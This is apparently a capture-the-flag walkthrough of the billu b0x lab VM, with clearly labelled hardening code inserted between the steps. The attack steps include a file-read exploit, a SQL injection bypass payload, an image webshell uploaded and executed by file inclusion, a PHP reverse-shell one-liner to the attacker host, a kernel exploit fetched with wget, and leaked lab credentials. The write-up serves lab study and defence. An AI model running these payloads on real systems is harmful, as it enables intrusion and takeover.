Target setup
No special setup needed.
Nmap scan
Host discovery
sudo nmap -sn 192.168.9.0/24
Comparing with the earlier sweep, one new IP appeared; that is the target: 192.168.9.154
TCP open-port scan
sudo nmap -sT --min-rate 10000 -p- 192.168.9.154
Ports 22 and 80 are open.
UDP open-port scan
sudo nmap -sU --min-rate 10000 -p- 192.168.9.154
No open UDP ports.
Detailed TCP scan (service versions, default scripts, OS)
sudo nmap -sT -sV -sC -O -p22,80 192.168.9.154 -oA nmap/detail
Linux + Apache. The Linux kernel version is fairly old.
vuln script scan
sudo nmap --script=vuln -p22,80 192.168.9.154
/test.php shows up; worth a closer look.
Getshell
80 - main page
It says "Show me your SQLI skills". Okay then, let's try SQL injection:
Appending ' or " gives neither an error nor any output QAQ
80 - test.php
No file parameter?
Try passing it via GET first: http://192.168.9.154/test.php?file=/etc/passwd
No response.
Try POST: curl http://192.168.9.154/test.php -X POST -d "file=/etc/passwd"
That returns output, but my curl skills are really poor; let's use Burp Suite instead QAQ
Heh, arbitrary file read confirmed. /etc/shadow is not readable, though. From /etc/passwd:
root:x:0:0:root:/root:/bin/bash
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
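The read above works because test.php passes the POSTed file path straight to the filesystem. The following is an added example, not code from the write-up and not the target's test.php (whose source is not shown on this page): a file-serving handler that confines the requested path to one directory, which is the check test.php evidently lacks. BASE_DIR and read_confined_file() are names chosen here.

```php
<?php
// Added example (not from the write-up; the target's test.php source is not shown on
// this page): a file-serving handler that confines the requested path to a single
// directory. BASE_DIR and read_confined_file() are names chosen here.

const BASE_DIR = '/var/www/public_files';   // assumed location of servable files

function read_confined_file(string $requested): ?string
{
    // Null bytes truncate paths in C-level calls; refuse them outright.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks and returns false for paths that
    // do not exist, so the comparison below is made on canonical absolute paths.
    // An absolute input such as "/etc/passwd" is prefixed with BASE_DIR first, so
    // it only resolves if such a file exists under BASE_DIR.
    $base = realpath(BASE_DIR);
    $path = realpath(BASE_DIR . '/' . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    // Compare with the trailing separator included: "/var/www/public_files_old/x"
    // would otherwise pass a plain prefix check against "/var/www/public_files".
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    if (!is_file($path) || !is_readable($path)) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

// Usage: same POST parameter name as test.php, but "/etc/passwd" or "../../etc/passwd"
// now resolves outside BASE_DIR (or not at all) and is refused.
if (isset($_POST['file'])) {
    $data = read_confined_file((string) $_POST['file']);
    if ($data === null) {
        http_response_code(403);
        exit('not allowed');
    }
    header('Content-Type: text/plain');
    echo $data;
}
```

The realpath() step matters more than any blocklist of ".." strings: symlinks planted inside the directory, or paths that only normalise to a traversal after resolution, are caught by comparing canonical paths, and a request for a file that does not exist fails closed rather than leaking an error message.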
Now read /index.php:
<?php
session_start();
include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
    $_SESSION['logged']='';
}
if($_SESSION['logged']==true && $_SESSION['admin']!='') # mark
{
    echo "you are logged in :)";
    header('Location: panel.php', true, 302);
}else
{
    echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
    $uname=str_replace('\'','',urldecode($_POST['un']));
    $pass=str_replace('\'','',urldecode($_POST['ps'])); # strips single quotes
    $run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\''; # mark
    $result = mysqli_query($conn, $run);
    if (mysqli_num_rows($result) > 0) {
        $row = mysqli_fetch_assoc($result);
        echo "You are allowed<br>";
        $_SESSION['logged']=true;
        $_SESSION['admin']=$row['username'];
        header('Location: panel.php', true, 302);
    }
    else
    {
        echo "<script>alert('Try again');</script>";
    }
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";
?>
Directory scan
sudo dirb http://192.168.9.154/
sudo gobuster dir -u http://192.168.9.154/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Keep reading files with test.php:
panel: file inclusion
<?php
session_start();
include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
    header('Location: index.php', true, 302);
    exit();
}
echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
    unset($_SESSION['logged']);
    unset($_SESSION['admin']);
    header('Location: index.php', true, 302);
}
echo '<hr><br>';
echo '<form method=post>
<select name=load>
<option value="show">Show Users</option>
<option value="add">Add User</option>
</select>
&nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
    $dir=getcwd();
    $choice=str_replace('./','',$_POST['load']);
    if($choice==='add')
    {
        include($dir.'/'.$choice.'.php');
        die();
    }
    if($choice==='show')
    {
        include($dir.'/'.$choice.'.php');
        die();
    }
    else
    {
        include($dir.'/'.$_POST['load']);
    }
}
if(isset($_POST['upload']))
{
    $name=mysqli_real_escape_string($conn,$_POST['name']);
    $address=mysqli_real_escape_string($conn,$_POST['address']);
    $id=mysqli_real_escape_string($conn,$_POST['id']);
    if(!empty($_FILES['image']['name']))
    {
        $iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
        $r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
        $image=array('jpeg','jpg','gif','png');
        if(in_array($r,$image))
        {
            $finfo = @new finfo(FILEINFO_MIME);
            $filetype = @$finfo->file($_FILES['image']['tmp_name']);
            if(preg_match('/image\/jpeg/',$filetype ) || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
            {
                if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
                {
                    echo "Uploaded successfully ";
                    $update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')';
                    mysqli_query($conn, $update);
                }
            }
            else
            {
                echo "<br>i told you dear, only png,jpg and gif file are allowed";
            }
        }
        else
        {
            echo "<br>only png,jpg and gif file are allowed";
        }
    }
}
?>
in.php: phpinfo()
head / head2: CSS styles
c.php: the SQL connection; it leaks a credential pair: "billu", "b0x_billu". Tried SSH with it; failed.
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
ini_set( 'session.cookie_httponly', 1 );
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
// Check connection
if (mysqli_connect_errno())
{
    echo "connection failed -> " . mysqli_connect_error();
}
?>
show.php: user listing
<?php
include('c.php');
if(isset($_POST['continue']))
{
    $run='select * from users ';
    $result = mysqli_query($conn, $run);
    if (mysqli_num_rows($result) > 0) {
        echo "<table width=90% ><tr><td>ID</td><td>User</td><td>Address</td><td>Image</td></tr>";
        while($row = mysqli_fetch_assoc($result))
        {
            echo '<tr><td>'.$row['id'].'</td><td>'.htmlspecialchars ($row['name'],ENT_COMPAT).'</td><td>'.htmlspecialchars ($row['address'],ENT_COMPAT).'</td><td><img src="uploaded_images/'.htmlspecialchars ($row['image'],ENT_COMPAT).'" height=90px width=100px></td></tr>';
        }
        echo "</table>";
    }
}
?>
add.php: image upload form
<?php
echo '<form method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name=image>
<input type=text name=name value="name">
<input type=text name=address value="address">
<input type=text name=id value=1337 >
<input type="submit" value="upload" name="upload">
</form>';
?>
80 - SQL injection
Back to the main page. With the index.php source in hand, the analysis is straightforward: single quotes in the input are filtered, but backslashes are not, so the query is injectable. The SQL query:
'select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\''
=> select * from auth where pass='.$pass.' and uname='.$uname.'
Input: ' or 1=1 -- \
=single-quote filtering=> \' or 1=1 -- \
What actually executes:
=> select * from auth where pass='\' or 1=1 -- \' and uname='\' or 1=1 -- \'
=> select * from auth where pass=' (enclosed in single quotes, so it no longer matters) '\' or 1=1 -- \'
=> select * from auth where pass=' (enclosed in single quotes, so it no longer matters) ' or 1=1 --
Login succeeded:
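The root cause above is that index.php builds the query by concatenating user input, and stripping quotes cannot cover every way of breaking out of a string literal (the trailing backslash does it). As an added example, not code from the write-up or from the billu b0x source, here is the same login check rewritten with a mysqli prepared statement. It assumes the auth table implied by the original query (columns uname and pass) and the $conn opened in c.php; login_user() is a name chosen here.

```php
<?php
// Added example (not the write-up's or billu b0x's code): index.php's login query as a
// prepared statement. Assumes the `auth` table (columns uname, pass) and the $conn
// from c.php; login_user() is a name chosen here. Returns the matched uname or null.

function login_user(mysqli $conn, string $uname, string $pass): ?string
{
    // The SQL text is fixed and sent to the server before any value is bound, so a
    // backslash or "' or 1=1 -- " in $pass is compared as data, never parsed as SQL.
    // No quote-stripping is needed, and none is done: it was the only "defence" above.
    $stmt = $conn->prepare('SELECT uname FROM auth WHERE uname = ? AND pass = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('ss', $uname, $pass);   // 'ss': two string parameters
    $stmt->execute();
    $res = $stmt->get_result();
    $row = $res ? $res->fetch_assoc() : null;
    $stmt->close();
    // Plain comparison kept only to mirror the original table; storing
    // password_hash() values and checking with password_verify() is the next step.
    return $row['uname'] ?? null;
}

// Drop-in for the isset($_POST['login']) branch of index.php.
if (isset($_POST['login'])) {
    $who = login_user($conn, (string) ($_POST['un'] ?? ''), (string) ($_POST['ps'] ?? ''));
    if ($who === null) {
        echo "<script>alert('Try again');</script>";
    } else {
        session_regenerate_id(true);   // fresh session id on privilege change
        $_SESSION['logged'] = true;
        $_SESSION['admin']  = $who;    // the uname the query matched on
        header('Location: panel.php', true, 302);
        exit();                        // index.php keeps executing after its redirect
    }
}
```

Note the exit() after the redirect: index.php falls through after header(), so even in the original a client that ignores the Location header keeps receiving the rest of the page.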
80 - image webshell upload
There is an upload form:
Crafted a fake jpg and uploaded it:
Blocked, so it must be checking the file header (magic bytes).
Make an image webshell: cat test.php >> backdoor.png
cat it again to check.
Upload succeeded:
Find the image URL: http://192.168.9.154/uploaded_images/backdoor.png
Next, use the file inclusion to get the .png executed as PHP: panel does the job.
(No idea why .png kept failing here; switching to .jpg worked??)
Reverse shell:
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#php
php -r '$sock=fsockopen("192.168.9.150",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Remember to URL-encode it.
Shell received.
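The chain above needs two panel.php weaknesses together: the upload check only looks at the extension and the MIME sniff (both satisfied by a real image with PHP appended), and the fall-through include($dir.'/'.$_POST['load']) executes whatever file name is posted. As an added example, not from the write-up or from the billu b0x source, the following hardens both. It assumes PHP 7+ with the gd and fileinfo extensions; PANEL_PAGES, include_panel_page() and store_uploaded_image() are names chosen here.

```php
<?php
// Added example (not from the write-up or the billu b0x source): hardened replacements
// for panel.php's include() of $_POST['load'] and its extension/MIME-only upload check.
// Assumes PHP 7+ with ext-gd and ext-fileinfo; the names below are chosen here.

// 1. Inclusion: map the user's choice onto a fixed file name. Anything not in the map
//    is refused, so no request value ever reaches include().
const PANEL_PAGES = ['show' => 'show.php', 'add' => 'add.php'];

function include_panel_page(string $choice): void
{
    if (!array_key_exists($choice, PANEL_PAGES)) {
        http_response_code(400);
        exit('unknown page');
    }
    include __DIR__ . '/' . PANEL_PAGES[$choice];
}

// 2. Upload: decide the type from content (not from the user's file name), re-encode
//    through GD so bytes appended to a real image ("cat test.php >> backdoor.png")
//    are dropped, and store under a server-chosen random name and extension.
function store_uploaded_image(array $file, string $dir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'][$mime] ?? null;
    if ($ext === null) {
        return null;
    }
    // GD decodes only the pixel data; trailing bytes and metadata chunks are not kept
    // when the image is written back out below.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;
    switch ($ext) {
        case 'jpg': $ok = imagejpeg($img, $dest, 90); break;
        case 'png': $ok = imagepng($img, $dest);      break;
        default:    $ok = imagegif($img, $dest);      break;
    }
    imagedestroy($img);
    return $ok ? $name : null;   // store $name in users.image with a prepared statement
}

// Usage, replacing the two branches in panel.php:
// if (isset($_POST['continue'])) { include_panel_page((string) ($_POST['load'] ?? '')); }
// if (isset($_POST['upload']))   { $stored = store_uploaded_image($_FILES['image'] ?? [], __DIR__ . '/uploaded_images'); }
```

The include map is the part that actually breaks the chain on this box: the .jpg was executed by include(), not by Apache's handler, so disabling PHP for uploaded_images (for mod_php, `php_admin_flag engine off` in that directory's `<Directory>` block) is worthwhile defence in depth but would not by itself have stopped it. Re-encoding also removes payloads hidden in PNG text chunks or JPEG comment segments, which a magic-byte check never sees.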
Method 2: phpMyAdmin getshell
The source obtained through the file inclusion suggests phpMyAdmin is present: http://192.168.9.154/phpmy/
Credentials from c.php: billu : b0x_billu
Logged in:
Both ways of planting a webshell through phpMyAdmin (see the subheadings) require three conditions:
- the export file path is not restricted
- the current user has the privilege to write files
- the web root is known
1. INTO OUTFILE to write a file directly
Check MySQL's export path setting:
SHOW VARIABLES LIKE '%secure%'
No restriction on where exported files may be written.
But we have no file-write privilege:
select '<?php phpinfo();?>' into outfile "/var/www/shell.php"
2. Use the log file to persist SQL containing the webshell
Test whether the log file can be used to plant it.
Check the general log status:
SHOW VARIABLES LIKE '%general%'
The general log is currently off, and a path is already set.
Try turning the general log on and pointing it at a path:
set global general_log = on;
set global general_log_file = '/var/www/shell.php';
No privilege; failed.
In summary: planting a webshell through phpMyAdmin failed.
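Both attempts above failed on the privilege condition, which is the one a defender controls most directly. As an added example, not part of the write-up, here is a check, run with the application's own database account, for the three preconditions listed earlier: export path, FILE/SUPER privileges, and general log state. It assumes a mysqli connection opened the way c.php does; audit_mysql_file_write() is a name chosen here.

```php
<?php
// Added example (not part of the write-up): checks, from the defender's side, the three
// preconditions listed above for writing a file through MySQL. Assumes a mysqli
// connection opened with the application's DB account, as c.php does.

function audit_mysql_file_write(mysqli $conn): array
{
    $report = [];

    // 1. Export path. Empty string -> INTO OUTFILE may write anywhere mysqld can.
    //    'NULL' (shown as text by SHOW VARIABLES) -> file import/export disabled.
    //    A directory -> writes confined to that directory.
    $res = $conn->query("SHOW VARIABLES LIKE 'secure_file_priv'");
    $val = $res ? ($res->fetch_assoc()['Value'] ?? null) : null;
    if ($val === null) {
        $report['secure_file_priv'] = 'unknown';
    } elseif ($val === '') {
        $report['secure_file_priv'] = 'UNRESTRICTED';
    } else {
        $report['secure_file_priv'] = ($val === 'NULL') ? 'disabled' : $val;
    }

    // 2. Privileges of the account the web app uses. FILE (global, ON *.*) is what
    //    INTO OUTFILE needs; SUPER (SYSTEM_VARIABLES_ADMIN on 8.0) is what
    //    "SET GLOBAL general_log_file" needs. A web-app account should hold neither.
    //    Heuristic: regex over the GRANT text; a table literally named FILE would
    //    produce a false positive, which is the safe direction for an audit.
    $grants = '';
    $res = $conn->query('SHOW GRANTS FOR CURRENT_USER()');
    while ($res && ($row = $res->fetch_row())) {
        $grants .= $row[0] . "\n";
    }
    $report['can_write_files']   = (bool) preg_match('/\b(FILE|ALL PRIVILEGES)\b.*\bON \*\.\*/', $grants);
    $report['can_redirect_logs'] = (bool) preg_match('/\b(SUPER|SYSTEM_VARIABLES_ADMIN|ALL PRIVILEGES)\b.*\bON \*\.\*/', $grants);

    // 3. General query log: if it is on and its file sits under a web root, every
    //    query text is written somewhere the web server may execute it.
    $res = $conn->query("SHOW VARIABLES LIKE 'general_log%'");
    while ($res && ($row = $res->fetch_assoc())) {
        $report[$row['Variable_name']] = $row['Value'];
    }
    return $report;
}

// Usage, with the connection from c.php:
// print_r(audit_mysql_file_write($conn));
```

On this box the first condition was met (export path unrestricted) and only the missing FILE and SUPER privileges stopped both methods; the fix that closes the door regardless of account privileges is setting secure_file_priv to a dedicated directory (or NULL) in the server configuration, since an application account that is later granted FILE would otherwise reopen it.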
Privilege escalation
Basic information
Confirm the target.
Use python to get an interactive tty.
Asks for a password, g
Kernel exploit privilege escalation
Failed attempts
Right, remember the kernel version was old. Try:
searchsploit linux kernel 3.13.0 | grep 'Privilege Escalation'
Closest version match: 34923
searchsploit -m 34923
# download
cat 34923.c
gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid
mkdir test
./fuse_suid test
Stand up a quick HTTP server on Kali: sudo php -S 0:80
On the target, switch to /tmp and download it: wget http://192.168.9.150/34923.c
Compilation failed; next one:
50135 failed
37292 escalated successfully
Nothing else looked particularly suitable. Widen the search: searchsploit linux kernel 3.13 | grep 'Privilege Escalation'
This machine is Ubuntu, so 37292:
searchsploit -m 37292 # checked: no special compile requirements
wget http://192.168.9.150/37292.c
gcc 37292.c -o 37292
Success!
Method 2: sensitive information leak in phpmy
Auto_Wordlists/wordlists/file_inclusion_linux.txt at main · carlospolop/Auto_Wordlists (github.com)
Search it for phpmy.
Found the name of a sensitive file:
It yields the database credentials: root/roottoor
Try SSH with them:
ssh root@192.168.9.154
# password: root/roottoor
Rooted!